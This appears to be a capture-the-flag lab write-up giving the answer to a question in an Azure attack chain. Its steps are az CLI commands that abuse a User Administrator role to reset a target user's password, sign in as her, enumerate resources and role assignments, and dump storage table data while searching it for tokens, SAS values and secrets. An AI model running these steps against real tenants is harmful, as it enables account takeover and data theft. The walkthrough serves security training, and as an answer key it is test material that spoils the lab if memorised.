The answer is the flag found after compromising the target user and enumerating her accessible Azure resources, usually storage/table data.
Detailed Solution:
Since the second compromised user is a User Administrator , abuse that role to reset the password of the target user.
az ad user update \
--id lila.nguyen@azuresecops.onmicrosoft.com \
--password ' NewP@ssw0rd12345! ' \
--force-change-password-next-sign-in false
Now authenticate as the target user.
az login -u lila.nguyen@azuresecops.onmicrosoft.com -p ' NewP@ssw0rd12345! '
Confirm the login context:
az account show
Check what Azure resources this user can see:
az resource list --output table
Check role assignments:
az role assignment list --all --output table
If the user has storage data-plane permissions, enumerate storage accounts:
az storage account list --output table
If the storage account is known from the lab chain, use it directly:
az storage table list \
--account-name excaliburstore \
--auth-mode login \
--output table
Query each table:
az storage entity query \
--account-name excaliburstore \
--table-name < table-name > \
--auth-mode login \
--output json
A faster method:
for table in $(az storage table list --account-name excaliburstore --auth-mode login --query " [].name " -o tsv); do
echo " ===== $table ===== "
az storage entity query \
--account-name excaliburstore \
--table-name " $table " \
--auth-mode login \
--output table
done
Search the output for:
Flag
SAS
token
container
storage
secret
The flag discovered in this stage is the Q7 answer.
Final Answer:
Use the Flag{...} value returned from the accessible table/storage data after logging in as lila.nguyen@azuresecops.onmicrosoft.com.
================
Submit